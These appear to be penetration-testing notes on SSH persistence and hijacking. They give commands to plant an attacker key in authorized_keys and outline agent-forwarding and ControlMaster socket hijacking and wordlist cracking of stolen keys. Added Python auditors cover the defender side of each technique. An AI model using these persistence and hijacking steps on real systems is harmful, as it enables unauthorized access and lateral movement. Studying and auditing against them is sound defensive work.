SSH

SSH Persistence and Hijacking

Persistence

If writable on the victim:

~/.ssh/authorized_keys

Create keys on attacker box

ssh-keygen

Copy the id_rsa.pub key to the victim (any of the following works)

echo "ssh-rsa AAAAB3NzaC1yc2E....ANSzp9EPhk4cIeX8= kali@kali" >> /home/kali/.ssh/authorized_keys
ssh-copy-id -p <port-number> user@hostname.example.com
cat ~/.ssh/id_rsa.pub | ssh <user>@<hostname> 'cat >> .ssh/authorized_keys'

Now you can SSH in without being prompted for a password

ssh kali@linuxvictim
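As an added, defender-side example (not part of these notes): a small Python auditor that parses an authorized_keys file, computes the OpenSSH SHA256 fingerprint of every key and reports entries that are not on an allowlist, do not parse, or whose declared type disagrees with the key blob. A periodic run of this over each user's file is how an appended line like the kali@kali entry above shows up. The sample file and the allowlist are constructed inline from filler ed25519 blobs, not real keys; `KNOWN_FINGERPRINTS` stands in for whatever inventory of expected keys an environment keeps.

```python
import base64
import hashlib
import re
import struct

# One authorized_keys entry: [options] <key-type> <base64 blob> [comment]
KEY_RE = re.compile(
    r"(?:^|\s)(ssh-(?:rsa|dss|ed25519)|ecdsa-sha2-nistp(?:256|384|521)|sk-[\w.@-]+)"
    r"\s+([A-Za-z0-9+/=]+)(?:\s+(.*))?$"
)


def fingerprint(blob: bytes) -> str:
    """OpenSSH-style fingerprint: SHA256 of the raw key blob, base64 without padding."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> list:
    """Return (line_no, entry) pairs; entry is None when the line does not parse."""
    entries = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = KEY_RE.search(line)
        if not m:
            entries.append((line_no, None))
            continue
        key_type, b64, comment = m.group(1), m.group(2), (m.group(3) or "").strip()
        try:
            blob = base64.b64decode(b64, validate=True)
        except ValueError:
            entries.append((line_no, None))
            continue
        # The blob's first wire-format string names the algorithm; it must match the declared type.
        wire_type = b""
        if len(blob) >= 4:
            (n,) = struct.unpack(">I", blob[:4])
            wire_type = blob[4:4 + n]
        entries.append((line_no, {
            "options": line[:m.start(1)].strip(),   # e.g. from="...",no-pty
            "key_type": key_type,
            "fingerprint": fingerprint(blob),
            "comment": comment,
            "type_ok": wire_type == key_type.encode(),
        }))
    return entries


def audit_authorized_keys(text: str, allowed_fingerprints: set) -> list:
    """Flag lines that are unparsable, internally inconsistent, or not in the allowlist."""
    findings = []
    for line_no, entry in parse_authorized_keys(text):
        if entry is None:
            findings.append({"line": line_no, "reason": "unparsable"})
        elif not entry["type_ok"]:
            findings.append({"line": line_no, "reason": "type-mismatch", **entry})
        elif entry["fingerprint"] not in allowed_fingerprints:
            findings.append({"line": line_no, "reason": "unknown-key", **entry})
    return findings


# --- constructed sample data (not real keys): ed25519 blobs built from filler bytes ---
def _wire_string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def _constructed_blob(key_bytes: bytes) -> bytes:
    return _wire_string(b"ssh-ed25519") + _wire_string(key_bytes)


def _constructed_line(comment: str, key_bytes: bytes, options: str = "") -> str:
    b64 = base64.b64encode(_constructed_blob(key_bytes)).decode()
    return f"{options + ' ' if options else ''}ssh-ed25519 {b64} {comment}"


SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed sample ~/.ssh/authorized_keys",
    _constructed_line("alice@workstation", bytes(range(32))),
    _constructed_line("deploy@ci", bytes([7] * 32), options='from="10.0.0.5",no-pty'),
    _constructed_line("kali@kali", bytes([0xAA] * 32)),   # the kind of entry the notes above append
    "ssh-rsa not-valid-base64!!! junk",                    # corrupted / unparsable line
])

# Allowlist of fingerprints the admin expects (here: the first two constructed keys).
KNOWN_FINGERPRINTS = {
    fingerprint(_constructed_blob(bytes(range(32)))),
    fingerprint(_constructed_blob(bytes([7] * 32))),
}

if __name__ == "__main__":
    for f in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS, KNOWN_FINGERPRINTS):
        print(f"line {f['line']}: {f['reason']} {f.get('fingerprint', '')} {f.get('comment', '')}")
```

Run against the constructed file it reports line 4 (the kali@kali key is not on the allowlist) and line 5 (unparsable). Fingerprints rather than comments are what to allowlist: the comment field is free text and is the first thing anyone planting a key would change.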

SSH Agent-Forwarding

Looking for socket files

  • Use an existing connection to reach another machine

  • Modification of ~/.ssh/config

  • Any new connection will try to use an existing control socket

  • Need to set permissions on the config file and create the ControlMaster folder

  • Create keys

  • Public keys need to be copied to the other boxes if possible

  • Must modify the local .ssh/config file to enable ForwardAgent

  • The intermediate server / controller must have AllowAgentForwarding enabled in its sshd config

  • Must enable the ssh agent on our Kali box

  • Now we must add our keys to the ssh agent

  • SSH into the controller as offsec, then SSH into linuxvictim as offsec and exit the linuxvictim session

Controlmaster config

  • Need to set permissions on the config file and create the ControlMaster folder

  • If there happens to be a session, it can be seen in the ControlMaster folder that was created

  • If there is an entry, you can SSH to that box by specifying ssh -S <control-socket>
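Both hijacks above depend on client-side settings (ForwardAgent, ControlMaster, ControlPath, ControlPersist) and on the intermediate server accepting forwarded agents (AllowAgentForwarding). As an added example, not taken from these notes, here is a Python audit of ssh_config and sshd_config text that flags those settings, including the case where AllowAgentForwarding is simply absent, because sshd defaults it to yes. The two config samples are constructed; the host names and the offsec user are placeholders from the scenario above, not real systems.

```python
import re

# Client settings that make the agent-forwarding / ControlMaster reuse described above possible.
# keyword (lowercased) -> (predicate on lowercased value, why it matters)
RISKY_CLIENT = {
    "forwardagent": (lambda v: v == "yes",
                     "every host you connect to can sign with your agent's keys while the session lasts"),
    "controlmaster": (lambda v: v in {"yes", "auto", "autoask", "ask"},
                      "multiplexing leaves a control socket that any process running as you can reuse"),
    "controlpersist": (lambda v: v != "no",
                       "the control socket stays open after you exit the session"),
    "controlpath": (lambda v: v.startswith(("/tmp/", "/var/tmp/", "/dev/shm/")),
                    "control socket lives in a shared directory instead of under ~/.ssh"),
}


def parse_ssh_config(text: str):
    """Yield (scope, keyword, value) for ssh_config / sshd_config style text.

    scope is the enclosing Host/Match block, or '*' for directives before any block.
    Keywords are case-insensitive and may be separated from values by whitespace or '='.
    """
    scope = "*"
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        keyword, value = parts[0].lower(), parts[1].strip().strip('"')
        if keyword in ("host", "match"):
            scope = value
            continue
        yield scope, keyword, value


def audit_client_config(text: str) -> list:
    """Findings for a ~/.ssh/config (ssh_config) file."""
    findings = []
    for scope, keyword, value in parse_ssh_config(text):
        check = RISKY_CLIENT.get(keyword)
        if check and check[0](value.lower()):
            findings.append({"scope": scope, "keyword": keyword, "value": value, "why": check[1]})
    return findings


def audit_sshd_config(text: str) -> list:
    """Findings for an sshd_config file. AllowAgentForwarding defaults to yes, so an absent
    directive is reported too: the server accepts forwarded agents unless told otherwise."""
    why = "server lets sessions reach a forwarded agent socket"
    findings, seen = [], False
    for scope, keyword, value in parse_ssh_config(text):
        if keyword == "allowagentforwarding":
            seen = True
            if value.lower() == "yes":
                findings.append({"scope": scope, "keyword": keyword, "value": value, "why": why})
    if not seen:
        findings.append({"scope": "*", "keyword": "allowagentforwarding",
                         "value": "(unset, defaults to yes)", "why": why})
    return findings


# Constructed sample files; host names are placeholders from the scenario above, not real systems.
SAMPLE_SSH_CONFIG = """\
# constructed ~/.ssh/config
Host controller
    HostName controller.example.internal
    User offsec
    ForwardAgent yes
    ControlMaster auto
    ControlPath /tmp/controlmaster/%r@%h:%p
    ControlPersist 10m

Host bastion
    ForwardAgent no
    ControlMaster no
"""

SAMPLE_SSHD_CONFIG = """\
# constructed /etc/ssh/sshd_config
PermitRootLogin no
PasswordAuthentication no
AllowAgentForwarding yes
"""

if __name__ == "__main__":
    for f in audit_client_config(SAMPLE_SSH_CONFIG) + audit_sshd_config(SAMPLE_SSHD_CONFIG):
        print(f"[{f['scope']}] {f['keyword']} = {f['value']}: {f['why']}")
```

The constructed client config yields four findings, all in the controller block; the bastion block, which turns both features off, yields none. On the server side the safe form is an explicit `AllowAgentForwarding no`, which is the only input for which `audit_sshd_config` returns nothing.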

Enumeration of sockets

  • Look for the SSH_AUTH_SOCK entry

Look for the last line, "SSH_AUTH_SOCK"

Cracking SSH Keys

Copy the SSH key to Kali

gunzip /usr/share/wordlists/rockyou.txt.gz (if not already done)

Use the cracked key to move laterally
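Added example, not from the original notes: a wordlist attack on a private key only succeeds because the passphrase is weak or absent, so the defender-side check is to inspect each private key file and report whether it is encrypted at all and how its passphrase is stretched. Legacy PEM files (`BEGIN RSA PRIVATE KEY`) signal encryption through Proc-Type/DEK-Info headers and derive the key with a single MD5 pass; openssh-key-v1 files record the cipher, the KDF and the bcrypt round count in their header, with 16 rounds being ssh-keygen's default unless `-a` is given. The sample key files below are constructed headers with zero filler, not usable keys; `classify` and its labels are this example's own triage scheme.

```python
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"
DEFAULT_BCRYPT_ROUNDS = 16  # what ssh-keygen uses unless -a is given


def _read_string(buf: bytes, off: int):
    """Read one length-prefixed (uint32, big-endian) string from the key's wire format."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def inspect_private_key(pem_text: str) -> dict:
    """Say whether a private key file is passphrase-protected and how its passphrase is stretched."""
    lines = [l.strip() for l in pem_text.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN"):
        return {"format": "unknown", "encrypted": None}
    if "OPENSSH PRIVATE KEY" not in lines[0]:
        # Legacy PEM (RSA/DSA/EC PRIVATE KEY): encryption is signalled by Proc-Type/DEK-Info
        # headers, and the passphrase is stretched with a single MD5 pass.
        encrypted = any(l.startswith("Proc-Type:") and "ENCRYPTED" in l for l in lines)
        return {"format": "pem", "encrypted": encrypted,
                "kdf": "md5" if encrypted else None, "rounds": None}
    body = "".join(l for l in lines[1:] if not l.startswith("-----"))
    blob = base64.b64decode(body)
    if not blob.startswith(OPENSSH_MAGIC):
        return {"format": "openssh", "encrypted": None, "error": "bad magic"}
    off = len(OPENSSH_MAGIC)
    cipher, off = _read_string(blob, off)    # "none" means the private part is stored in clear
    kdf, off = _read_string(blob, off)       # "bcrypt" when a passphrase is set
    kdfopts, off = _read_string(blob, off)   # bcrypt: string salt + uint32 rounds
    rounds = None
    if kdf == b"bcrypt":
        _salt, o = _read_string(kdfopts, 0)
        (rounds,) = struct.unpack(">I", kdfopts[o:o + 4])
    return {"format": "openssh", "encrypted": cipher != b"none",
            "cipher": cipher.decode(), "kdf": kdf.decode(), "rounds": rounds}


def classify(report: dict) -> str:
    """Triage label: an unprotected key needs no cracking; weak stretching makes wordlists cheap."""
    if report.get("encrypted") is False:
        return "unprotected"
    if report.get("format") == "pem":
        return "legacy-kdf"
    rounds = report.get("rounds")
    if rounds is not None and rounds < DEFAULT_BCRYPT_ROUNDS:
        return "low-rounds"
    return "protected"


# --- constructed samples: only the openssh-key-v1 header is realistic; key material is zero filler ---
def _s(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def _constructed_openssh_key(cipher: bytes, kdf: bytes, rounds: int) -> str:
    kdfopts = _s(b"\x00" * 16) + struct.pack(">I", rounds) if kdf == b"bcrypt" else b""
    blob = OPENSSH_MAGIC + _s(cipher) + _s(kdf) + _s(kdfopts) + struct.pack(">I", 1) + b"\x00" * 64
    b64 = base64.b64encode(blob).decode()
    body = "\n".join(b64[i:i + 70] for i in range(0, len(b64), 70))
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{body}\n-----END OPENSSH PRIVATE KEY-----\n"


SAMPLES = {
    "no-passphrase": _constructed_openssh_key(b"none", b"none", 0),
    "default-rounds": _constructed_openssh_key(b"aes256-ctr", b"bcrypt", 16),
    "hardened": _constructed_openssh_key(b"aes256-ctr", b"bcrypt", 100),   # as made by ssh-keygen -a 100
    "legacy-pem": ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                   "DEK-Info: AES-128-CBC,00000000000000000000000000000000\n\nAAAA\n"
                   "-----END RSA PRIVATE KEY-----\n"),
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        r = inspect_private_key(text)
        print(f"{name:15} {classify(r):12} {r}")
```

Running the check over every id_* file in users' ~/.ssh directories gives a list of keys to rotate: anything labelled unprotected or legacy-kdf, and anything with a low round count. Keys regenerated in the openssh-key-v1 format with a high `-a` value and a long passphrase are the ones for which the wordlist step above stops being practical.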
